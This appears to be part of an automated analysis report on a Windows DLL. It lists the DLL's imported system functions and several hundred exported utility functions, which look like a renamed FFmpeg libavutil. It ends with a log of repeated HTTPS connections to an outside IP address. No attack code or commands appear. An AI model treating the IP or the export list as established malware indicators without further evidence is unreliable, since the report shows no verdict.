RT_VERSION | 0x1e3058 | 0x31c | data | English | United States
DLL | Import
bcrypt.dll | BCryptCloseAlgorithmProvider, BCryptGenRandom, BCryptOpenAlgorithmProvider
KERNEL32.dll | AcquireSRWLockExclusive, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileMappingA, CreateMutexA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FileTimeToSystemTime, FreeLibrary, GetConsoleMode, GetConsoleScreenBufferInfo, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFullPathNameW, GetHandleInformation, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessAffinityMask, GetProcessTimes, GetStdHandle, GetSystemDirectoryW, GetSystemTimeAdjustment, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetThreadTimes, GetTickCount64, GetTimeZoneInformation, InitOnceBeginInitialize, InitOnceComplete, InitializeConditionVariable, InitializeCriticalSection, InitializeSRWLock, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LoadLibraryExA, LoadLibraryExW, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReleaseMutex, ReleaseSRWLockExclusive, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, SetConsoleTextAttribute, SetEvent, SetLastError, SetProcessAffinityMask, SetSystemTime, SetThreadContext, SetThreadPriority, Sleep, SleepConditionVariableSRW, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteConsoleW
msvcrt.dll | __mb_cur_max, __setusermatherr, _aligned_free, _aligned_malloc, _aligned_realloc, _amsg_exit, _beginthreadex, _endthreadex, _errno, _fstat64, _get_osfhandle, _gmtime64, _hypot, _initterm, _iob, _localtime64, _lock, _mktime64, _setjmp3, _sopen, _ultoa, _unlock, _wsopen, abort, acos, asin, atan, atoi, bsearch, calloc, clock, cosh, exit, fprintf, fputc, fputs, free, fwrite, getc, getenv, islower, isspace, isupper, isxdigit, localeconv, log10, malloc, memchr, memcmp, memcpy, memmove, memset, printf, rand, realloc, setlocale, sinh, strchr, strcmp, strcpy, strcspn, strerror, strftime, strlen, strncmp, strrchr, strspn, strstr, strtol, strtoul, tan, tanh, tolower, ungetc, vfprintf, wcscat, wcscpy, wcslen, wcsrchr, longjmp, _strdup, _read, _isatty, _fdopen, _close
USER32.dll | GetDesktopWindow
Name  Ordinal  Address
mv_add_i  1  0x10023c30
mv_add_q  2  0x10035990
mv_add_stable  3  0x10027e10
mv_adler32_update  4  0x10001410
mv_aes_alloc  5  0x10001bd0
mv_aes_crypt  6  0x10001bf0
mv_aes_ctr_alloc  7  0x100022f0
mv_aes_ctr_crypt  8  0x10002480
mv_aes_ctr_free  9  0x10002420
mv_aes_ctr_get_iv  10  0x10002370
mv_aes_ctr_increment_iv  11  0x10002430
mv_aes_ctr_init  12  0x100023c0
mv_aes_ctr_set_full_iv  13  0x10002340
mv_aes_ctr_set_iv  14  0x10002310
mv_aes_ctr_set_random_iv  15  0x10002380
mv_aes_init  16  0x10001c10
mv_aes_size  17  0x100ae00c
mv_append_path_component  18  0x10006eb0
mv_asprintf  19  0x10006850
mv_assert0_fpu  20  0x1008cfa0
mv_audio_fifo_alloc  21  0x10002670
mv_audio_fifo_drain  22  0x10002af0
mv_audio_fifo_free  23  0x10002610
mv_audio_fifo_peek  24  0x10002900
mv_audio_fifo_peek_at  25  0x10002990
mv_audio_fifo_read  26  0x10002a40
mv_audio_fifo_realloc  27  0x100027b0
mv_audio_fifo_reset  28  0x10002b70
mv_audio_fifo_size  29  0x10002bb0
mv_audio_fifo_space  30  0x10002bc0
mv_audio_fifo_write  31  0x10002850
mv_base64_decode  32  0x100076c0
mv_base64_encode  33  0x100078d0
mv_basename  34  0x10006d70
mv_blowfish_alloc  35  0x10007da0
mv_blowfish_crypt  36  0x100084b0
mv_blowfish_crypt_ecb  37  0x10007dc0
mv_blowfish_init  38  0x100a6ac0
mv_bmg_get  39  0x10024fe0
mv_bprint_append_data  40  0x10008f30
mv_bprint_channel_layout  41  0x1000c9f0
mv_bprint_chars  42  0x10008d20
mv_bprint_clear  43  0x10009670
mv_bprint_escape  44  0x10009730
mv_bprint_finalize  45  0x10009690
mv_bprint_get_buffer  46  0x10009500
mv_bprint_init  47  0x10008880
mv_bprint_init_for_buffer  48  0x100089a0
mv_bprint_strftime  49  0x10009130
mv_bprintf  50  0x100089c0
mv_buffer_alloc  51  0x10009dc0
mv_buffer_allocz  52  0x10009ef0
mv_buffer_create  53  0x10009e60
mv_buffer_default_free  54  0x10009d10
mv_buffer_get_opaque  55  0x1000a090
mv_buffer_get_ref_count  56  0x1000a0a0
mv_buffer_is_writable  57  0x1000a070
mv_buffer_make_writable  58  0x1000a0b0
mv_buffer_pool_buffer_get_opaque  59  0x1000a9b0
mv_buffer_pool_get  60  0x1000a720
mv_buffer_pool_init  61  0x1000a5f0
mv_buffer_pool_init2  62  0x1000a590
mv_buffer_pool_uninit  63  0x1000a650
mv_buffer_realloc  64  0x1000a1d0
mv_buffer_ref  65  0x10009fc0
mv_buffer_replace  66  0x1000a480
mv_buffer_unref  67  0x1000a000
mv_calloc  68  0x100291f0
mv_camellia_alloc  69  0x1000b0b0
mv_camellia_crypt  70  0x1000b0d0
mv_camellia_init  71  0x100a6c8e
mv_camellia_size  72  0x100af650
mv_cast5_alloc  73  0x1000c090
mv_cast5_crypt  74  0x1000c1b0
mv_cast5_crypt2  75  0x1000c0b0
mv_cast5_init  76  0x100a7a6e
mv_cast5_size  77  0x100b1a60
mv_channel_description  78  0x1000c470
mv_channel_description_bprint  79  0x1000c3c0
mv_channel_from_string  80  0x1000c560
mv_channel_layout_channel_from_index  81  0x1000dc10
mv_channel_layout_channel_from_string  82  0x1000eac0
mv_channel_layout_check  83  0x1000ec10
mv_channel_layout_compare  84  0x1000edb0
mv_channel_layout_copy  85  0x1000d340
mv_channel_layout_default  86  0x1000eff0
mv_channel_layout_describe  87  0x1000dba0
mv_channel_layout_describe_bprint  88  0x1000d4d0
mv_channel_layout_extract_channel  89  0x1000d060
mv_channel_layout_from_mask  90  0x1000d1b0
mv_channel_layout_from_string  91  0x1000dd40
mv_channel_layout_index_from_channel  92  0x1000e760
mv_channel_layout_index_from_string  93  0x1000e950
mv_channel_layout_standard  94  0x1000f050
mv_channel_layout_subset  95  0x1000f080
mv_channel_layout_uninit  96  0x1000d270
mv_channel_name  97  0x1000c2d0
mv_channel_name_bprint  98  0x1000c220
mv_chroma_location_enum_to_pos  99  0x10034f30
mv_chroma_location_from_name  100  0x10034ee0
mv_chroma_location_name  101  0x10034ec0
mv_chroma_location_pos_to_enum  102  0x10034f70
mv_cmp_i  103  0x10024200
mv_color_primaries_from_name  104  0x10034d90
mv_color_primaries_name  105  0x10034d70
mv_color_range_from_name  106  0x10034d20
mv_color_range_name  107  0x10034d00
mv_color_space_from_name  108  0x10034e70
mv_color_space_name  109  0x10034e50
mv_color_transfer_from_name  110  0x10034e00
mv_color_transfer_name  111  0x10034de0
mv_compare_mod  112  0x100279f0
mv_compare_ts  113  0x10027830
mv_content_light_metadata_alloc  114  0x10027020
mv_content_light_metadata_create_side_data  115  0x10027050
mv_cpu_count  116  0x1000f8f0
mv_cpu_force_count  117  0x1000f9e0
mv_cpu_max_align  118  0x1000f9f0
mv_crc  119  0x100101d0
mv_crc_get_table  120  0x1000fdb0
mv_crc_init  121  0x1000fbc0
mv_csp_luma_coeffs_from_avcsp  122  0x100102b0
mv_csp_primaries_desc_from_id  123  0x100102f0
mv_csp_primaries_id_from_desc  124  0x10010320
mv_d2q  125  0x10035aa0
mv_d2str  126  0x100068e0
mv_default_get_category  127  0x10026240
mv_default_item_name  128  0x10026230
mv_des_alloc  129  0x10010d80
mv_des_crypt  130  0x10010e40
mv_des_init  131  0x10010da0
mv_des_mac  132  0x10010e90
mv_detection_bbox_alloc  133  0x10010ee0
mv_detection_bbox_create_side_data  134  0x10010f70
mv_dict_copy  135  0x10011d20
mv_dict_count  136  0x10011070
mv_dict_free  137  0x10011cc0
mv_dict_get  138  0x100110d0
mv_dict_get_string  139  0x100121a0
mv_dict_iterate  140  0x10011090
mv_dict_parse_string  141  0x100118c0
mv_dict_set  142  0x10011210
mv_dict_set_int  143  0x10011560
mv_dirname  144  0x10006e10
mv_display_matrix_flip  145  0x100126f0
mv_display_rotation_get  146  0x10012470
mv_display_rotation_set  147  0x100125c0
mv_div_i  148  0x10024ef0
mv_div_q  149  0x10035920
mv_dovi_alloc  150  0x10012780
mv_dovi_metadata_alloc  151  0x100127b0
mv_downmix_info_update_side_data  152  0x10012800
mv_dynamic_hdr_plus_alloc  153  0x1001d0a0
mv_dynamic_hdr_plus_create_side_data  154  0x1001d0d0
mv_dynamic_hdr_vivid_alloc  155  0x1001d130
mv_dynamic_hdr_vivid_create_side_data  156  0x1001d160
mv_dynarray2_add  157  0x100296f0
mv_dynarray_add  158  0x10029620
mv_dynarray_add_nofree  159  0x10029560
mv_encryption_info_add_side_data  160  0x10012f30
mv_encryption_info_alloc  161  0x10012a70
mv_encryption_info_clone  162  0x10012b40
mv_encryption_info_free  163  0x10012cf0
mv_encryption_info_get_side_data  164  0x10012d40
mv_encryption_init_info_add_side_data  165  0x10013860
mv_encryption_init_info_alloc  166  0x10013100
mv_encryption_init_info_free  167  0x100132d0
mv_encryption_init_info_get_side_data  168  0x10013480
mv_escape  169  0x10007050
mv_expr_count_func  170  0x100176e0
mv_expr_count_vars  171  0x10017650
mv_expr_eval  172  0x100177a0
mv_expr_free  173  0x10015280
mv_expr_parse  174  0x10017110
mv_expr_parse_and_eval  175  0x100177f0
mv_fast_malloc  176  0x10029d10
mv_fast_mallocz  177  0x10029df0
mv_fast_realloc  178  0x10029c60
mv_fifo_alloc  179  0x10018a20
mv_fifo_alloc2  180  0x10017e40
mv_fifo_alloc_array  181  0x10018990
mv_fifo_auto_grow_limit  182  0x10017ef0
mv_fifo_can_read  183  0x10017f10
mv_fifo_can_write  184  0x10017f40
mv_fifo_drain  185  0x100192b0
mv_fifo_drain2  186  0x100188c0
mv_fifo_elem_size  187  0x10017f00
mv_fifo_free  188  0x10018aa0
mv_fifo_freep  189  0x10018ae0
mv_fifo_freep2  190  0x10018950
mv_fifo_generic_peek  191  0x10019120
mv_fifo_generic_peek_at  192  0x10018fc0
mv_fifo_generic_read  193  0x10019160
mv_fifo_generic_write  194  0x10018e70
mv_fifo_grow  195  0x10018ce0
mv_fifo_grow2  196  0x10017f70
mv_fifo_peek  197  0x10018760
mv_fifo_peek_to_cb  198  0x100188a0
mv_fifo_read  199  0x10018500
mv_fifo_read_to_cb  200  0x100186c0
mv_fifo_realloc2  201  0x10018b70
mv_fifo_reset  202  0x10018b20
mv_fifo_reset2  203  0x10018930
mv_fifo_size  204  0x10018b40
mv_fifo_space  205  0x10018b50
mv_fifo_write  206  0x100180f0
mv_fifo_write_from_cb  207  0x100182a0
mv_file_map  208  0x100192e0
mv_file_unmap  209  0x10019570
mv_film_grain_params_alloc  210  0x10019b60
mv_film_grain_params_create_side_data  211  0x10019b90
mv_find_best_pix_fmt_of_2  212  0x10034a40
mv_find_info_tag  213  0x10032410
mv_find_nearest_q_idx  214  0x10035e60
mv_fopen_utf8  215  0x10019b50
mv_force_cpu_flags  216  0x1000f820
mv_fourcc_make_string  217  0x1008ced0
mv_frame_alloc  218  0x1001ac40
mv_frame_apply_cropping  219  0x1001c490
mv_frame_clone  220  0x1001c050
mv_frame_copy  221  0x1001b8d0
mv_frame_copy_props  222  0x1001b550
mv_frame_free  223  0x1001adb0
mv_frame_get_buffer  224  0x1001adf0
mv_frame_get_plane_buffer  225  0x1001b570
mv_frame_get_side_data  226  0x1001b890
mv_frame_is_writable  227  0x1001b4b0
mv_frame_make_writable  228  0x1001c210
mv_frame_move_ref  229  0x1001b320
mv_frame_new_side_data  230  0x1001b7e0
mv_frame_new_side_data_from_buf  231  0x1001b750
mv_frame_ref  232  0x1001bc40
mv_frame_remove_side_data  233  0x1001c3e0
mv_frame_side_data_name  234  0x1001c470
mv_frame_unref  235  0x1001b300
mv_free  236  0x100290d0
mv_freep  237  0x100290e0
mv_gcd  238  0x10027090
mv_gcd_q  239  0x100362f0
mv_get_alt_sample_fmt  240  0x1003c9f0
mv_get_bits_per_pixel  241  0x100345a0
mv_get_bytes_per_sample  242  0x1003cb50
mv_get_channel_description  243  0x1000cf80
mv_get_channel_layout  244  0x1000c640
mv_get_channel_layout_channel_index  245  0x1000cd50
mv_get_channel_layout_nb_channels  246  0x1000cc80
mv_get_channel_layout_string  247  0x1000cbf0
mv_get_channel_name  248  0x1000cea0
mv_get_colorspace_name  249  0x1001ac20
mv_get_cpu_flags  250  0x1000f880
mv_get_default_channel_layout  251  0x1000cd10
mv_get_extended_channel_layout  252  0x1000c8f0
mv_get_known_color_name  253  0x10031760
mv_get_media_type_string  254  0x1008cd60
mv_get_packed_sample_fmt  255  0x1003ca30
mv_get_padded_bits_per_pixel  256  0x100345f0
mv_get_picture_type_char  257  0x1008cd80
mv_get_pix_fmt  258  0x10034480
mv_get_pix_fmt_loss  259  0x10034a10
mv_get_pix_fmt_name  260  0x10034450
mv_get_pix_fmt_string  261  0x100346a0
mv_get_planar_sample_fmt  262  0x1003ca70
mv_get_random_seed  263  0x10035030
mv_get_sample_fmt  264  0x1003c860
mv_get_sample_fmt_name  265  0x1003c840
mv_get_sample_fmt_string  266  0x1003caa0
mv_get_standard_channel_layout  267  0x1000d150
mv_get_time_base_q  268  0x1008cf90
mv_get_token  269  0x10006940
mv_gettime  270  0x1004dbb0
mv_gettime_relative  271  0x1004dbf0
mv_gettime_relative_is_monotonic  272  0x1004dc60
mv_hash_alloc  273  0x1001c790
mv_hash_final  274  0x1001cb30
mv_hash_final_b64  275  0x1001ce80
mv_hash_final_bin  276  0x1001cbc0
mv_hash_final_hex  277  0x1001ce00
mv_hash_freep  278  0x1001d070
mv_hash_get_name  279  0x1001c770
mv_hash_get_size  280  0x1001c780
mv_hash_init  281  0x1001c870
mv_hash_names  282  0x1001c750
mv_hash_update  283  0x1001ca10
mv_hmac_alloc  284  0x1001d220
mv_hmac_calc  285  0x1001d720
mv_hmac_final  286  0x1001d5a0
mv_hmac_free  287  0x1001d3a0
mv_hmac_init  288  0x1001d3e0
mv_hmac_update  289  0x1001d590
mv_hwdevice_ctx_alloc  290  0x1001d9d0
mv_hwdevice_ctx_create  291  0x1001e0b0
mv_hwdevice_ctx_create_derived  292  0x1001e320
mv_hwdevice_ctx_create_derived_opts  293  0x1001e190
mv_hwdevice_ctx_init  294  0x1001db30
mv_hwdevice_find_type_by_name  295  0x1001d920
mv_hwdevice_get_hwframe_constraints  296  0x1001dfd0
mv_hwdevice_get_type_name  297  0x1001d970
mv_hwdevice_hwconfig_alloc  298  0x1001dfa0
mv_hwdevice_iterate_types  299  0x1001d990
mv_hwframe_constraints_free  300  0x1001e070
mv_hwframe_ctx_alloc  301  0x1008d450
mv_hwframe_ctx_create_derived  302  0x1001ea30
mv_hwframe_ctx_init  303  0x1001e7f0
mv_hwframe_get_buffer  304  0x1001e690
mv_hwframe_map  305  0x1001e450
mv_hwframe_transfer_data  306  0x1001dd70
mv_hwframe_transfer_get_formats  307  0x1001dd40
mv_i2int  308  0x10024fb0
mv_image_alloc  309  0x10021d20
mv_image_check_sar  310  0x100222b0
mv_image_check_size  311  0x100221c0
mv_image_check_size2  312  0x10022070
mv_image_copy  313  0x10022610
mv_image_copy_plane  314  0x100224f0
mv_image_copy_plane_uc_from  315  0x10022390
mv_image_copy_to_buffer  316  0x10023350
mv_image_copy_uc_from  317  0x10022af0
mv_image_fill_arrays  318  0x10022fe0
mv_image_fill_black  319  0x10023620
mv_image_fill_linesizes  320  0x100215d0
mv_image_fill_max_pixsteps  321  0x10021380
mv_image_fill_plane_sizes  322  0x100219b0
mv_image_fill_pointers  323  0x10021af0
mv_image_get_buffer_size  324  0x10023180
mv_image_get_linesize  325  0x10021480
mv_int2i  326  0x10024f80
mv_int_list_length_for_size  327  0x1008cda0
                                                                    mv_lfg_init3280x100a7ee0
                                                                    mv_lfg_init_from_data3290x10025100
                                                                    mv_log3300x10026560
                                                                    mv_log23310x10024fc0
                                                                    mv_log2_16bit3320x10024fd0
                                                                    mv_log2_i3330x10023dd0
                                                                    mv_log_default_callback3340x10025b10
                                                                    mv_log_format_line3350x10026550
                                                                    mv_log_format_line23360x10026250
                                                                    mv_log_get_flags3370x10026710
                                                                    mv_log_get_level3380x100266e0
                                                                    mv_log_once3390x100265d0
                                                                    mv_log_set_callback3400x10026720
                                                                    mv_log_set_flags3410x10026700
                                                                    mv_log_set_level3420x100266f0
                                                                    mv_lzo1x_decode3430x10026870
                                                                    mv_malloc3440x10028d50
                                                                    mv_malloc_array3450x10028ec0
                                                                    mv_mallocz3460x10029100
                                                                    mv_mallocz_array3470x10028f20
                                                                    mv_mastering_display_metadata_alloc3480x10026f40
                                                                    mv_mastering_display_metadata_create_side_data3490x10026f60
                                                                    mv_match_list3500x100075a0
                                                                    mv_match_name3510x10007100
                                                                    mv_max_alloc3520x10028d40
                                                                    mv_md5_alloc3530x10028790
                                                                    mv_md5_final3540x100289f0
                                                                    mv_md5_init3550x100287b0
                                                                    mv_md5_size3560x100b7208
                                                                    mv_md5_sum3570x10028b00
                                                                    mv_md5_update3580x100287e0
                                                                    mv_memcpy_backptr3590x10029830
                                                                    mv_memdup3600x100294a0
                                                                    mv_mod_i3610x100243c0
                                                                    mv_mul_i3620x10023e60
                                                                    mv_mul_q3630x100358c0
                                                                    mv_murmur3_alloc3640x10029fc0
                                                                    mv_murmur3_final3650x1002a800
                                                                    mv_murmur3_init3660x1002a0d0
                                                                    mv_murmur3_init_seeded3670x10029fe0
                                                                    mv_murmur3_update3680x1002a1b0
                                                                    mv_nearer_q3690x10035ca0
                                                                    mv_opt_child_class_iterate3700x100303a0
                                                                    mv_opt_child_next3710x10030380
                                                                    mv_opt_copy3720x10030430
                                                                    mv_opt_eval_double3730x1002f620
                                                                    mv_opt_eval_flags3740x1002f520
                                                                    mv_opt_eval_float3750x1002f5e0
                                                                    mv_opt_eval_int3760x1002f560
                                                                    mv_opt_eval_int643770x1002f5a0
                                                                    mv_opt_eval_q3780x1002f660
                                                                    mv_opt_find3790x1002ee70
                                                                    mv_opt_find23800x1002ec60
                                                                    mv_opt_flag_is_set3810x100302d0
                                                                    mv_opt_free3820x1002ebd0
                                                                    mv_opt_freep_ranges3830x10030760
                                                                    mv_opt_get3840x1002d870
                                                                    mv_opt_get_channel_layout3850x1002e4c0
                                                                    mv_opt_get_chlayout3860x1002e550
                                                                    mv_opt_get_dict_val3870x1002e5e0
                                                                    mv_opt_get_double3880x1002df00
                                                                    mv_opt_get_image_size3890x1002e1a0
                                                                    mv_opt_get_int3900x1002dd90
                                                                    mv_opt_get_key_value3910x1002ea50
                                                                    mv_opt_get_pixel_fmt3920x1002e3c0
                                                                    mv_opt_get_q3930x1002e010
                                                                    mv_opt_get_sample_fmt3940x1002e440
                                                                    mv_opt_get_video_rate3950x1002e230
                                                                    mv_opt_is_set_to_default3960x10030800
                                                                    mv_opt_is_set_to_default_by_name3970x10030d80
                                                                    mv_opt_next3980x1002c760
                                                                    mv_opt_ptr3990x100303c0
                                                                    mv_opt_query_ranges4000x10030700
                                                                    mv_opt_query_ranges_default4010x1002b9f0
                                                                    mv_opt_serialize4020x10030dd0
                                                                    mv_opt_set4030x1002f6a0
                                                                    mv_opt_set_bin4040x1002cfc0
                                                                    mv_opt_set_channel_layout4050x1002d730
                                                                    mv_opt_set_chlayout4060x1002d820
                                                                    mv_opt_set_defaults4070x1002ea30
                                                                    mv_opt_set_defaults24080x1002e6b0
                                                                    mv_opt_set_dict4090x100302a0
                                                                    mv_opt_set_dict24100x10030180
                                                                    mv_opt_set_dict_val4110x1002d7b0
                                                                    mv_opt_set_double4120x1002c9d0
                                                                    mv_opt_set_from_string4130x1002ff20
                                                                    mv_opt_set_image_size4140x1002d120
                                                                    mv_opt_set_int4150x1002c7b0
                                                                    mv_opt_set_pixel_fmt4160x1002d510
                                                                    mv_opt_set_q4170x1002ccc0
                                                                    mv_opt_set_sample_fmt4180x1002d620
                                                                    mv_opt_set_video_rate4190x1002d1e0
                                                                    mv_opt_show24200x1002e640
                                                                    mv_parse_color4210x10031420
                                                                    mv_parse_cpu_caps4220x1000f8b0
                                                                    mv_parse_ratio4230x100310f0
                                                                    mv_parse_time4240x10031c30
                                                                    mv_parse_video_rate4250x100312c0
                                                                    mv_parse_video_size4260x10031200
                                                                    mv_pix_fmt_count_planes4270x10034870
                                                                    mv_pix_fmt_desc_get4280x10034790
                                                                    mv_pix_fmt_desc_get_id4290x10034800
                                                                    mv_pix_fmt_desc_next4300x100347c0
                                                                    mv_pix_fmt_get_chroma_sub_sample4310x10034830
                                                                    mv_pix_fmt_swap_endianness4320x10034920
                                                                    mv_pixelutils_get_sad_fn4330x10035000
                                                                    mv_q2intfloat4340x10036090
                                                                    mv_rc4_alloc4350x100363e0
                                                                    mv_rc4_crypt4360x100364e0
                                                                    mv_rc4_init4370x10036400
                                                                    mv_read_image_line4380x100339c0
                                                                    mv_read_image_line24390x10033270
                                                                    mv_realloc4400x10028da0
                                                                    mv_realloc_array4410x10029010
                                                                    mv_realloc_f4420x10028de0
                                                                    mv_reallocp4430x10028e40
                                                                    mv_reallocp_array4440x10029050
                                                                    mv_reduce4450x100353b0
                                                                    mv_rescale4460x10027760
                                                                    mv_rescale_delta4470x10027a80
                                                                    mv_rescale_q4480x100277e0
                                                                    mv_rescale_q_rnd4490x100277b0
                                                                    mv_rescale_rnd4500x10027220
                                                                    mv_ripemd_alloc4510x1003c470
                                                                    mv_ripemd_final4520x1003c6e0
                                                                    mv_ripemd_init4530x100a7f8c
                                                                    mv_ripemd_size4540x100bf9a4
                                                                    mv_ripemd_update4550x1003c490
                                                                    mv_sample_fmt_is_planar4560x1003cb70
                                                                    mv_samples_alloc4570x1003ce40
                                                                    mv_samples_alloc_array_and_samples4580x1003d010
                                                                    mv_samples_copy4590x1003d270
                                                                    mv_samples_fill_arrays4600x1003ccd0
                                                                    mv_samples_get_buffer_size4610x1003cb90
                                                                    mv_samples_set_silence4620x1003d450
                                                                    mv_set_options_string4630x1002fd50
                                                                    mv_sha512_alloc4640x1004c260
                                                                    mv_sha512_final4650x1004c4c0
                                                                    mv_sha512_init4660x100a81b0
                                                                    mv_sha512_size4670x100bfaec
                                                                    mv_sha512_update4680x1004c280
                                                                    mv_sha_alloc4690x100411a0
                                                                    mv_sha_final4700x10041410
                                                                    mv_sha_init4710x100a80b4
                                                                    mv_sha_size4720x100bfae4
                                                                    mv_sha_update4730x100411c0
                                                                    mv_shr_i4740x10024280
                                                                    mv_size_mult4750x10029fa0
                                                                    mv_small_strptime4760x10031790
                                                                    mv_spherical_alloc4770x1004d120
                                                                    mv_spherical_from_name4780x1004d280
                                                                    mv_spherical_projection_name4790x1004d260
                                                                    mv_spherical_tile_bounds4800x1004d150
                                                                    mv_sscanf4810x10002f80
                                                                    mv_stereo3d_alloc4820x1004d2d0
                                                                    mv_stereo3d_create_side_data4830x1004d2f0
                                                                    mv_stereo3d_from_name4840x1004d360
                                                                    mv_stereo3d_type_name4850x1004d340
                                                                    mv_strcasecmp4860x10006b30
                                                                    mv_strdup4870x100292e0
                                                                    mv_strerror4880x10013b30
                                                                    mv_strireplace4890x10006bf0
                                                                    mv_stristart4900x10006580
                                                                    mv_stristr4910x100065f0
                                                                    mv_strlcat4920x10006750
                                                                    mv_strlcatf4930x100067f0
                                                                    mv_strlcpy4940x100066e0
                                                                    mv_strncasecmp4950x10006b80
                                                                    mv_strndup4960x100293b0
                                                                    mv_strnstr4970x10006660
                                                                    mv_strstart4980x10006530
                                                                    mv_strtod4990x100150e0
                                                                    mv_strtok5000x10006aa0
                                                                    mv_sub_i5010x10023d00
                                                                    mv_sub_q5020x10035a10
                                                                    mv_tea_alloc5030x1004d460
                                                                    mv_tea_crypt5040x1004d4b0
                                                                    mv_tea_init5050x1004d480
                                                                    mv_tea_size5060x100bfc60
                                                                    mv_tempfile5070x100195a0
                                                                    mv_thread_message_flush5080x1004db40
                                                                    mv_thread_message_queue_alloc5090x1004d700
                                                                    mv_thread_message_queue_free5100x1004d7d0
                                                                    mv_thread_message_queue_nb_elems5110x1004d880
                                                                    mv_thread_message_queue_recv5120x1004d9b0
                                                                    mv_thread_message_queue_send5130x1004d8d0
                                                                    mv_thread_message_queue_set_err_recv5140x1004daf0
                                                                    mv_thread_message_queue_set_err_send5150x1004daa0
                                                                    mv_thread_message_queue_set_free_func5160x1004d7c0
                                                                    mv_timecode_adjust_ntsc_framenum25170x1004dd30
                                                                    mv_timecode_check_frame_rate5180x1004e8c0
                                                                    mv_timecode_get_smpte5190x1004e080
                                                                    mv_timecode_get_smpte_from_framenum5200x1004ddd0
                                                                    mv_timecode_init5210x1004e930
                                                                    mv_timecode_init_from_components5220x1004ea50
                                                                    mv_timecode_init_from_string5230x1004ec80
                                                                    mv_timecode_make_mpeg_tc_string5240x1004e850
                                                                    mv_timecode_make_smpte_tc_string5250x1004e720
                                                                    mv_timecode_make_smpte_tc_string25260x1004e520
                                                                    mv_timecode_make_string5270x1004e270
                                                                    mv_timegm5280x10031b50
                                                                    mv_tree_destroy5290x1004f8f0
                                                                    mv_tree_enumerate5300x1004fad0
                                                                    mv_tree_find5310x1004ef60
                                                                    mv_tree_insert5320x1004f020
                                                                    mv_tree_node_alloc5330x1004ef40
                                                                    mv_tree_node_size5340x100bfd80
                                                                    mv_twofish_alloc5350x10050090
                                                                    mv_twofish_crypt5360x100500b0
                                                                    mv_twofish_init5370x100a8637
                                                                    mv_twofish_size5380x100bfda0
                                                                    mv_tx_init5390x100a9843
                                                                    mv_tx_uninit5400x100a8f2b
                                                                    mv_usleep5410x1004dc70
                                                                    mv_utf8_decode5420x10007270
                                                                    mv_util_ffversion5430x100c3fa0
                                                                    mv_uuid_parse5440x1008d110
                                                                    mv_uuid_parse_range5450x1008cff0
                                                                    mv_uuid_unparse5460x1008d160
                                                                    mv_uuid_urn_parse5470x1008d3e0
                                                                    mv_vbprintf5480x10008b70
                                                                    mv_version_info5490x1008d440
                                                                    mv_video_enc_params_alloc5500x1008d480
                                                                    mv_video_enc_params_create_side_data5510x1008d500
                                                                    mv_vk_frame_alloc5520x10021370
                                                                    mv_vkfmt_from_pixfmt5530x10021360
                                                                    mv_vlog5540x10026650
                                                                    mv_write_image_line5550x10034210
                                                                    mv_write_image_line25560x10033e70
                                                                    mv_xtea_alloc5570x10090760
                                                                    mv_xtea_crypt5580x100907d0
                                                                    mv_xtea_init5590x10090780
                                                                    mv_xtea_le_crypt5600x10090910
                                                                    mv_xtea_le_init5610x100907b0
                                                                    mvpriv_alloc_fixed_dsp5620x10019fa0
                                                                    mvpriv_cga_font5630x100c59e0
                                                                    mvpriv_dict_set_timestamp5640x10012370
                                                                    mvpriv_float_dsp_alloc5650x100a7b20
                                                                    mvpriv_fopen_utf85660x10019a90
                                                                    mvpriv_get_gamma_from_trc5670x1000f7d0
                                                                    mvpriv_get_trc_function_from_trc5680x1000f800
                                                                    mvpriv_init_lls5690x100a7f58
                                                                    mvpriv_open5700x100195e0
                                                                    mvpriv_report_missing_feature5710x100267e0
                                                                    mvpriv_request_sample5720x10026730
                                                                    mvpriv_scalarproduct_float_c5730x1001a2e0
                                                                    mvpriv_set_systematic_pal25740x10021bf0
                                                                    mvpriv_slicethread_create5750x1004ce50
                                                                    mvpriv_slicethread_execute5760x1004cb50
                                                                    mvpriv_slicethread_free5770x1004cd20
                                                                    mvpriv_solve_lls5780x10025270
                                                                    mvpriv_tempfile5790x10019970
                                                                    mvpriv_vga16_font5800x100c49e0
                                                                    mvutil_configuration5810x1008d460
                                                                    mvutil_license5820x1008d470
                                                                    next5830x1001db90
Language of compilation system: English
Country where language is spoken: United States
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                    May 31, 2023 02:02:28.845082045 CEST44349739124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:28.845304966 CEST49739443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:28.846070051 CEST49739443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:28.846101999 CEST44349739124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:32.038935900 CEST44349739124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:32.040954113 CEST49740443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:32.041023016 CEST44349740124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:32.041162968 CEST49740443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:32.041806936 CEST49740443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:32.041827917 CEST44349740124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:35.102032900 CEST44349740124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:35.103128910 CEST49741443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:35.103169918 CEST44349741124.122.47.148192.168.2.5
                                                                    May 31, 2023 02:02:35.103255033 CEST49741443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:35.103368998 CEST49741443192.168.2.5124.122.47.148
                                                                    May 31, 2023 02:02:35.103405952 CEST44349741124.122.47.148192.168.2.5
